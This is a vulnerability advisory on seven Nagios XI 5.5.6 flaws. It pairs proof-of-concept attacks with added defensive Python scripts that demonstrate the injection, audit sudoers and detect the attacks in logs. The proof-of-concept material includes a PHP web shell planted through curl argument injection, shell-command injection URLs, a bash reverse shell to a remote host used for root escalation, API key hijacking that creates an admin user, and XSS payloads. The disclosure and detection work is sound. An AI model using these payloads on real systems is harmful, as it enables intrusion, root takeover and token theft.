Tenable has discovered multiple vulnerabilities in Nagios XI 5.5.6.
CVE-2018-15708: Magpie_debug.php Unauthenticated RCE via Command Argument Injection
A critical vulnerability exists in the MagpieRSS library. This library contains a custom version of the Snoopy component which allows a remote, unauthenticated attacker to inject arbitrary arguments into a "curl" command. By requesting magpie_debug.php with a crafted value specified in the HTTP GET 'url' parameter, the vulnerable component can be exploited to write arbitrary data to a location on disk that is writable by the 'apache' user. For instance, the location /usr/local/nagvis/share/ is writable and publicly accessible. If an attacker were to write PHP code to this location, arbitrary code execution may be achieved with the privileges of the apache user.
Combined with the local privilege escalation vulnerability, arbitrary code execution with root privileges is feasible.
Magpie_debug.php accepts an HTTP GET parameter, 'url', and subsequently calls fetch_rss() with the URL as an argument. The fetch_rss function is defined in /usr/local/nagiosxi/html/includes/dashlets/rss_dashlet/magpierss/rss_fetch.inc and is used to perform an HTTP request against the provided URL. Digging further, the _fetch_remote_file() function is called, which then instantiates a Snoopy object. The fetch() method of the Snoopy class is then called, which eventually ends up calling the _httpsrequest() method if an HTTPS URL was specified.
Specifically, the problematic code relates to this line in Snoopy.class.inc:
exec($this->curl_path." -D \"/tmp/$headerfile\"".escapeshellcmd($cmdline_params)." ".escapeshellcmd($URI),$results,$return);
A remote attacker can exploit this flaw without difficulty.
Proof of Concept
Suppose an attacker sets up a web server at https://192.168.1.191:8080/. The attacker configures the server to respond with PHP code. Something like this:
<?php system($_GET['cmd']); ?>
The Nagios XI instance is located at https://192.168.1.208. Using the following URL, the attacker may exploit the flaw in the Snoopy class and write the PHP code to /usr/local/nagvis/share/exec.php. Notice that "-o /usr/local/nagvis/share/exec.php" is included in the value of the 'url' parameter. This tells curl to output the response to this file.
https://192.168.1.208/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php?url=https://192.168.1.191:8080/%20-o%20/usr/local/nagvis/share/exec.php
Once this request is completed, the attacker can execute arbitrary system commands by crafting a URL such as the following:
https://192.168.1.208/nagvis/exec.php?cmd=whoami
CVE-2018-15709: Cmdsubsys.php Authenticated Command Injection
The Nagios subsystem is vulnerable to command injection in many cases. An authenticated attacker may inject and execute arbitrary OS commands. This can be accomplished by a low-privileged user (non-admin).
Ultimately, the subsystem commands are handled by /usr/local/nagiosxi/cron/cmdsubsys.php.
The proof of concept below exploits the command COMMAND_NAGIOSXI_SET_HTACCESS (1100) by injecting OS commands into the 'password' field. A code snippet is provided to show the vulnerable code. Please note that this is not the only vulnerable command.
case COMMAND_NAGIOSXI_SET_HTACCESS:
$cmdarr = unserialize($command_data);
$cmdline = $cfg['htpasswd_path']." -b -s ".$cfg['htaccess_file']." ".$cmdarr["username"]." '".$cmdarr["password"]."'";
break;
...
$output = system($cmdline, $return_code);
Proof of Concept
Be sure to replace the IP address and 'nsp' value accordingly.
https://192.168.1.208/nagiosxi/ajaxhelper.php?cmd=submitcommand&opts={%22cmd%22:1100,%22cmddata%22:{%22username%22:%22test%22,%22password%22:%22test%27%3bwhoami%20%3E%20/usr/local/nagiosxi/tmp/whoami.txt%3b%27%22},%22cmdtime%22:0,%22cmdargs%22:%22%22}&nsp=30a86418c0953be277b67c5149f9b4be762f08e14a92fcbece756922f5df2312
Afterward, it can be verified that the command worked as expected. Notice the user is 'nagios'.
$ cat /usr/local/nagiosxi/tmp/whoami.txt
nagios
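The root cause of CVE-2018-15709 is that cmdsubsys.php builds one shell string by concatenating the untrusted 'password' field and hands it to system(). The following Python script is an added illustration, not code from the advisory or from Nagios XI: it rebuilds the same command string, tokenises it the way a POSIX shell would to show the injected ';' and 'whoami' becoming separate commands, and then shows the two fixes a defender would apply, quoting the field (shlex.quote, the equivalent of PHP's escapeshellarg) or passing it as a single argv element with no shell at all. The htpasswd and htaccess paths are assumed stand-ins for $cfg['htpasswd_path'] and $cfg['htaccess_file'], and a python child process stands in for htpasswd so the demonstration runs anywhere.

```python
import shlex
import subprocess
import sys

# Constructed inputs mirroring the advisory's PoC: a benign password and the
# injected one (a single quote closes the quoted field, ';' chains a command).
BENIGN_PASSWORD = "test"
INJECTED_PASSWORD = "test';whoami > /usr/local/nagiosxi/tmp/whoami.txt;'"

# Assumed stand-ins for $cfg['htpasswd_path'] and $cfg['htaccess_file'].
HTPASSWD_PATH = "/usr/bin/htpasswd"
HTACCESS_FILE = "/usr/local/nagiosxi/html/.htpasswd"


def vulnerable_cmdline(username: str, password: str) -> str:
    """Rebuild the command string the way cmdsubsys.php concatenates it."""
    return f"{HTPASSWD_PATH} -b -s {HTACCESS_FILE} {username} '{password}'"


def quoted_cmdline(username: str, password: str) -> str:
    """Same string, but each untrusted field is shell-quoted (escapeshellarg equivalent)."""
    return (f"{HTPASSWD_PATH} -b -s {HTACCESS_FILE} "
            f"{shlex.quote(username)} {shlex.quote(password)}")


def hardened_argv(username: str, password: str) -> list:
    """Pass each field as one argv element; no shell ever parses the password."""
    return [HTPASSWD_PATH, "-b", "-s", HTACCESS_FILE, username, password]


def shell_words(cmdline: str) -> list:
    """Tokenise as a POSIX shell would, keeping ';', '>' and friends as their own tokens."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def echo_single_argument(password: str) -> str:
    """Run a child with the password as argv[1] and return what it received.

    Python stands in for htpasswd here; the point is that the injected
    string arrives as one literal argument and nothing in it is executed.
    """
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1], end='')", password],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout


if __name__ == "__main__":
    print("vulnerable tokens:", shell_words(vulnerable_cmdline("test", INJECTED_PASSWORD)))
    print("quoted tokens:    ", shell_words(quoted_cmdline("test", INJECTED_PASSWORD)))
    print("argv form:        ", hardened_argv("test", INJECTED_PASSWORD))
    print("child received:   ", echo_single_argument(INJECTED_PASSWORD))
```

In the vulnerable token list the password field ends at the attacker's quote and 'whoami', '>' and the output path follow as separate words; in the quoted form and the argv form the whole injected string is a single token. The argv form is preferable because it removes the shell from the call path entirely, which also covers the other subsystem commands the advisory notes are affected.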
CVE-2018-15710: Autodiscover_new.php Local Privilege Escalation via Command Injection
autodiscover_new.php suffers from a local command injection vulnerability which can be exploited to gain root OS privileges. This file is protected by Source Guardian, so a full root cause analysis cannot be conducted. However, based on results of black box testing, it is clear that the value of the 'addresses' command line parameter is incorporated in a subsequent call to a dangerous PHP function used to launch another process. Furthermore, the value is unsanitized before being used to construct the command line. This coding flaw allows an attacker to inject and execute arbitrary shell commands.
Additionally, the /etc/sudoers file contains entries that enable this PHP script to be launched with root privileges without a password.
User_Alias NAGIOSXI=nagios
User_Alias NAGIOSXIWEB=apache
...
NAGIOSXI ALL = NOPASSWD:/usr/bin/php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php *
...
NAGIOSXIWEB ALL = NOPASSWD:/usr/bin/php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php *
Proof of Concept
If we put it all together, the 'apache' and 'nagios' users may exploit the command injection flaw to gain root privileges. Note that the payload in this case is a reverse bash shell connecting back to 192.168.1.191 over TCP port 4444.
sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/0;/bin/bash -i >& /dev/tcp/192.168.1.191/4444 0>&1;'
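The sudoers entries above are what turn a command injection in a PHP script into root: the trailing '*' lets the caller supply any arguments, including the injected '--addresses' value. The following audit script is an added example, not part of the advisory; it resolves User_Alias definitions and reports every NOPASSWD rule whose command carries a wildcard in its argument list. The sudoers excerpt is constructed from the lines quoted above, with an extra wildcard-free rule added so the contrast is visible.

```python
import re

# Constructed excerpt modelled on the /etc/sudoers lines quoted in the advisory.
# The third NAGIOSXI rule (no trailing '*') is added here for contrast.
SAMPLE_SUDOERS = """\
User_Alias NAGIOSXI=nagios
User_Alias NAGIOSXIWEB=apache
Defaults    requiretty
NAGIOSXI ALL = NOPASSWD:/usr/bin/php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php *
NAGIOSXIWEB ALL = NOPASSWD:/usr/bin/php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php *
NAGIOSXI ALL = NOPASSWD:/usr/bin/php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php
root ALL=(ALL) ALL
"""

# user_or_alias  host_list = [(runas)] command_spec
RULE_RE = re.compile(
    r"^\s*(?P<who>\S+)\s+(?P<hosts>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<spec>.+)$"
)
SKIP_PREFIXES = ("#", "Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")


def parse_user_aliases(text: str) -> dict:
    """Map each User_Alias name to the list of users it expands to."""
    aliases = {}
    for line in text.splitlines():
        m = re.match(r"^\s*User_Alias\s+(\w+)\s*=\s*(.+)$", line)
        if m:
            aliases[m.group(1)] = [u.strip() for u in m.group(2).split(",")]
    return aliases


def find_wildcard_nopasswd(text: str) -> list:
    """Return NOPASSWD rules whose command arguments contain a '*' wildcard.

    In sudoers a '*' in the argument position matches any argument string,
    so the listed users control every parameter the command receives.
    """
    aliases = parse_user_aliases(text)
    findings = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m or "NOPASSWD:" not in m.group("spec"):
            continue
        commands = m.group("spec").split("NOPASSWD:", 1)[1]
        for cmd in commands.split(","):
            cmd = cmd.strip()
            parts = cmd.split(None, 1)
            args = parts[1] if len(parts) > 1 else ""
            if "*" in args:
                findings.append({
                    "users": aliases.get(m.group("who"), [m.group("who")]),
                    "runas": m.group("runas") or "root",
                    "command": cmd,
                })
    return findings


if __name__ == "__main__":
    for f in find_wildcard_nopasswd(SAMPLE_SUDOERS):
        print(f"{', '.join(f['users'])} -> ({f['runas']}) {f['command']}")
```

Run against a real file with `sudo cat /etc/sudoers /etc/sudoers.d/*`. Each hit is a rule where the only thing standing between the listed users and root is the argument handling inside the target program, which is exactly the assumption autodiscover_new.php fails to honour. The parser covers the rule syntax shown on the page; Cmnd_Alias expansion and line continuations are not handled.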
CVE-2018-15711: Unauthorized API Key Regeneration
A low-privileged, authenticated user can force API key regeneration for any Nagios XI user (including admins). When the API key is regenerated, a new one is returned in the response body. This enables the malicious user to then perform subsequent API calls with an elevated level of permissions. For instance, a new admin user could be created.
Proof of Concept
The following URL can be used to regenerate the API key for a user with ID 1 (nagiosadmin). Take note that the IP address and 'nsp' value will need to be updated accordingly.
https://192.168.1.208/nagiosxi/ajaxhelper.php?cmd=getxicoreajax&opts={%22func%22:%22set_random_api_key%22,%22args%22:{%22user_id%22:1}}&nsp=cc326511f1d7384bb9bf4ff619c9db91756574acb65217d27109923d6647a37e
The associated response looks like this:
HTTP/1.1 200 OK
Date: Tue, 23 Oct 2018 18:56:07 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
X-Powered-By: PHP/5.4.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
Content-Length: 64
Connection: close
Content-Type: text/html; charset=UTF-8
XKrjj3f20Fr49jiQF5E2LkZ3bl9spABmAjYSFdUV9FZBeBHTGhbnEaJ5PSQeIoTe
Note that the API key returned belongs to the user for which it was regenerated. In this case, the API key belongs to nagiosadmin. This serves as a privilege escalation within the Nagios XI application because more functionality can now be invoked.
For example, a new admin user could be added.
https://192.168.1.208/nagiosxi/api/v1/add_user&apikey=XKrjj3f20Fr49jiQF5E2LkZ3bl9spABmAjYSFdUV9FZBeBHTGhbnEaJ5PSQeIoTe&username=scrappy&password=scrappy&[email protected]&name=scrappy+do&auth_level=admin&api_enabled=1&force_pw_change=0&can_see_all_hs=1&can_control_all_hs=1&can_reconfigure_hs=1&can_control_engine=1&can_use_advanced=1
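All three of the request-driven issues above (the curl argument injection in magpie_debug.php, the subsystem command injection through ajaxhelper.php's submitcommand, and the API key regeneration through getxicoreajax) leave a distinctive trace in the web server's access log. The following detection script is an added example, not part of the advisory: it parses Apache combined-format lines, decodes the query string and the JSON 'opts' parameter that ajaxhelper.php expects, and applies one rule per CVE. The log lines are constructed from the PoC URLs on this page with a benign RSS request for contrast; the 'nsp' values are placeholders.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache access-log lines (combined format) built from the
# request URLs in the advisory, plus a benign RSS dashlet request first.
SAMPLE_LOG = """\
192.168.1.191 - - [23/Oct/2018:18:50:01 +0000] "GET /nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php?url=https://example.com/feed.xml HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.1.191 - - [23/Oct/2018:18:51:12 +0000] "GET /nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php?url=https://192.168.1.191:8080/%20-o%20/usr/local/nagvis/share/exec.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.191 - - [23/Oct/2018:18:53:40 +0000] "GET /nagiosxi/ajaxhelper.php?cmd=submitcommand&opts={%22cmd%22:1100,%22cmddata%22:{%22username%22:%22test%22,%22password%22:%22test%27%3bwhoami%20%3E%20/usr/local/nagiosxi/tmp/whoami.txt%3b%27%22},%22cmdtime%22:0,%22cmdargs%22:%22%22}&nsp=NSP_PLACEHOLDER HTTP/1.1" 200 64 "-" "Mozilla/5.0"
192.168.1.191 - - [23/Oct/2018:18:56:07 +0000] "GET /nagiosxi/ajaxhelper.php?cmd=getxicoreajax&opts={%22func%22:%22set_random_api_key%22,%22args%22:{%22user_id%22:1}}&nsp=NSP_PLACEHOLDER HTTP/1.1" 200 64 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Whitespace followed by an option inside the 'url' value: escapeshellcmd leaves
# spaces alone, so this is an extra argument handed to curl.
CURL_OPTION = re.compile(r"\s-{1,2}[A-Za-z]")
# Characters that change how a shell parses the concatenated command line.
SHELL_META = re.compile(r"[;&|`$'\"\\]")


def _opts(params: dict):
    """Decode the JSON 'opts' parameter; None when absent or malformed."""
    raw = params.get("opts", [None])[0]
    if raw is None:
        return None
    try:
        return json.loads(raw)
    except ValueError:
        return None


def classify_request(target: str):
    """Return the name of the rule a request target trips, or None."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    if parts.path.endswith("/magpie_debug.php"):
        if CURL_OPTION.search(params.get("url", [""])[0]):
            return "CVE-2018-15708 curl argument injection in 'url'"
    elif parts.path.endswith("/ajaxhelper.php"):
        cmd = params.get("cmd", [""])[0]
        opts = _opts(params)
        if not isinstance(opts, dict):
            return None
        if cmd == "submitcommand":
            data = opts.get("cmddata", {})
            values = data.values() if isinstance(data, dict) else [str(data)]
            if any(isinstance(v, str) and SHELL_META.search(v) for v in values):
                return "CVE-2018-15709 shell metacharacters in subsystem command data"
        if cmd == "getxicoreajax" and opts.get("func") == "set_random_api_key":
            return "CVE-2018-15711 API key regeneration request"
    return None


def scan_access_log(lines) -> list:
    """Return one finding per log line that matches a rule."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        rule = classify_request(m.group("target"))
        if rule:
            findings.append({"ip": m.group("ip"), "time": m.group("ts"), "rule": rule})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"{f['time']} {f['ip']} {f['rule']}")
```

The metacharacter rule will also fire on legitimate passwords that happen to contain quotes or semicolons, so treat it as a triage signal rather than a verdict; the set_random_api_key rule fires on every regeneration because the access log does not record which account issued the request, and the user_id in the request must be compared against the session owner in the application's own logs. Note that only GET requests are visible this way; the same parameters sent in a POST body never reach the access log.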
CVE-2018-15712: Api_tool.php Unauthenticated Persistent Cross-site Scripting
A persistent cross-site scripting (XSS) vulnerability exists in the Nagios XI Business Process Intelligence (BPI) component's api_tool.php. The file located at /usr/local/nagiosxi/etc/components/bpi.conf can be tampered with. An attacker is able to inject new entries by crafting the HTTP GET 'host' parameter value. This file is read by /nagiosxi/includes/components/nagiosbpi/index.php when a user opens the BPI view.
A bpi.conf file that was tampered with could end up looking like the following. Take note of the second entry:
define linux-servers {
title=HG: linux-servers
desc=
primary=1
info=
members=localhost;NULL;&, hello
}
define <script>alert(1)</script> {
desc=</strong><script>alert(2)</script>;NULL;&,
warning_threshold=0
critical_threshold=0
priority=0
type=hostgroup
auth_users=
}
Proof of Concept
Note: Be sure to change IP addresses to match your environment.
Two requests are required to inject the XSS payload:
https://192.168.1.208/nagiosxi/includes/components/nagiosbpi/api_tool.php?cmd=syncall
https://192.168.1.208/nagiosxi/includes/components/nagiosbpi/api_tool.php?cmd=addmember&group=linux-servers&host=hello%0a}%0adefine%20%3Cscript%3Ealert(1)%3C/script%3E%20{%0adesc=%3C/strong%3E%3Cscript%3Ealert(2)%3C/script%3E
Once these have completed, log in as a valid user and visit the following URL:
https://192.168.1.208/nagiosxi/includes/components/nagiosbpi/index.php
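Because the injected payload persists in bpi.conf rather than in a database, an integrity check on that file is a practical way to find past exploitation. The following parser is an added example, not code from the advisory or from the BPI component: it reads the define blocks and flags any group whose name is not a plain identifier or whose settings contain HTML markup. The sample input reproduces the tampered file shown above; the "plain identifier" rule is an assumed policy and should be widened if a deployment legitimately uses other characters in group names.

```python
import re

# Constructed bpi.conf contents reproducing the tampered file shown in the advisory.
TAMPERED_BPI_CONF = """\
define linux-servers {
title=HG: linux-servers
desc=
primary=1
info=
members=localhost;NULL;&, hello
}
define <script>alert(1)</script> {
desc=</strong><script>alert(2)</script>;NULL;&,
warning_threshold=0
critical_threshold=0
priority=0
type=hostgroup
auth_users=
}
"""

# Assumed policy: group names written by the BPI component are plain identifiers.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]+$")
HTML_MARKUP = re.compile(r"[<>]")
DEFINE_RE = re.compile(r"^define\s+(.*?)\s*\{\s*$")


def parse_bpi_conf(text: str) -> list:
    """Return a list of {'name': ..., 'settings': {key: value}} for each define block."""
    groups = []
    current = None
    for line in text.splitlines():
        m = DEFINE_RE.match(line)
        if m:
            current = {"name": m.group(1), "settings": {}}
            groups.append(current)
        elif line.strip() == "}":
            current = None
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            current["settings"][key.strip()] = value
    return groups


def find_tampered_entries(text: str) -> list:
    """Flag groups whose name or settings look injected rather than generated."""
    findings = []
    for group in parse_bpi_conf(text):
        reasons = []
        if not SAFE_NAME.match(group["name"]):
            reasons.append("group name is not a plain identifier")
        for key, value in group["settings"].items():
            if HTML_MARKUP.search(value):
                reasons.append(f"markup in '{key}'")
        if reasons:
            findings.append({"name": group["name"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_tampered_entries(TAMPERED_BPI_CONF):
        print(repr(f["name"]), "->", "; ".join(f["reasons"]))
```

Run it over /usr/local/nagiosxi/etc/components/bpi.conf after patching to confirm no injected groups remain; the members value of the first group ("hello" appended by the addmember request) is preserved by the parser so it can be compared against the real host list.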
CVE-2018-15713: Users.php Authenticated Persistent Cross-site Scripting
A persistent cross-site scripting vulnerability was discovered in Nagios XI in admin/users.php. This vulnerability requires authentication to be exploited successfully.
Specifically, the vulnerability exists due to the lack of input validation when displaying a user's e-mail address on admin/users.php. This value can be defined by modifying a user's e-mail address via /account/main.php or /admin/users.php. Users.php requires an administrator level of access; however, main.php does not. This means that a low-privileged user can inject an XSS payload, and an admin user will be impacted by the attack.
Fortunately, cookies are flagged as 'httpOnly', so malicious JavaScript can't access the session ID stored in the cookie. However, the Nagios Session Protector (nsp) value may be accessed because it is stored in the DOM. This will allow an attacker to steal these tokens and subsequently create malicious forms or links to facilitate request forgery.
Proof of Concept
In order to test the PoCs, replace the IP address with an accessible IP or hostname which has a Nagios XI instance installed/configured, update the 'nsp' value, and update the cookie accordingly.
POST /nagiosxi/account/main.php?page=acctinfo HTTP/1.1
Host: 192.168.1.208
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.208/nagiosxi/account/main.php?&=
Content-Type: application/x-www-form-urlencoded
Content-Length: 359
Cookie: nagiosxi=sg3pa9fi5e4ngj6a4jgm287jg7
Connection: close
Upgrade-Insecure-Requests: 1
update=1&nsp=e7fc3b0557861b1f39d6a2827edcf515086c7f2ec96acdd885a952266ba437be&current_password=&password1=&password2=&name=Scooby+Doo&email=%3Cscript%3Ealert%28%22hello+poppet%22%29%3C%2Fscript%3Escooby1%40tenable.com&language=en_US&theme=&highcharts_default_type=line&defaultDateFormat=1&defaultNumberFormat=2&defaultWeekFormat=0&updateButton=Update+Settings
POST /nagiosxi/admin/users.php?edit=1&user_id[]=2 HTTP/1.1
Host: 192.168.1.208
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.208/nagiosxi/admin/users.php?edit=1&user_id[]=2
Content-Type: application/x-www-form-urlencoded
Content-Length: 498
Cookie: nagiosxi=sg3pa9fi5e4ngj6a4jgm287jg7
Connection: close
Upgrade-Insecure-Requests: 1
update=1&nsp=02bc33485c2fd6edac30ee7e7af1a2f14d47c36ffb9cd8c9b5e74721bb886dbd&users=1&user_id%5B%5D=2&username=scooby&password1=&password2=&name=Scooby+Doo&email=%3Cscript%3Ealert%28nsp_str%29%3C%2Fscript%3Escooby1%40tenable.com&phone=&enable_notifications=on&enabled=on&language=en_US&defaultDateFormat=1&defaultNumberFormat=2&defaultWeekFormat=0&auth_type=local&ad_username=&dn=&level=1&ccm_access=0&apikey=jt2ZRc3fdPnn6VSKn3QZZdSVabJp7tbJZcY8n2mT7MBcYpdFMjU2PMXYeWHkpRkJ&updateButton=Update+User
CVE-2018-15714: Checkauth.php Reflected Cross-site Scripting
A reflected cross-site scripting vulnerability exists within account/checkauth.php. The HTTP GET 'oname' parameter is not processed safely; therefore, malicious JavaScript can be injected and executed. Other parameters, such as 'oname2', are exploitable as well.
For example, the following code snippet from checkauth.php outputs the values of the 'oname' and 'oname2' parameters into the HTML response.
<td>Object Name:</td>
<td><input type="text" name="oname" value="<?php echo $oname; ?>" size="15">
<input type="text" name="oname2" value="<?php echo $oname2; ?>" size="15"></td>
Proof of Concept
https://192.168.1.208/nagiosxi/account/checkauth.php?oname=" autofocus onfocus="javascript:alert(nsp_str)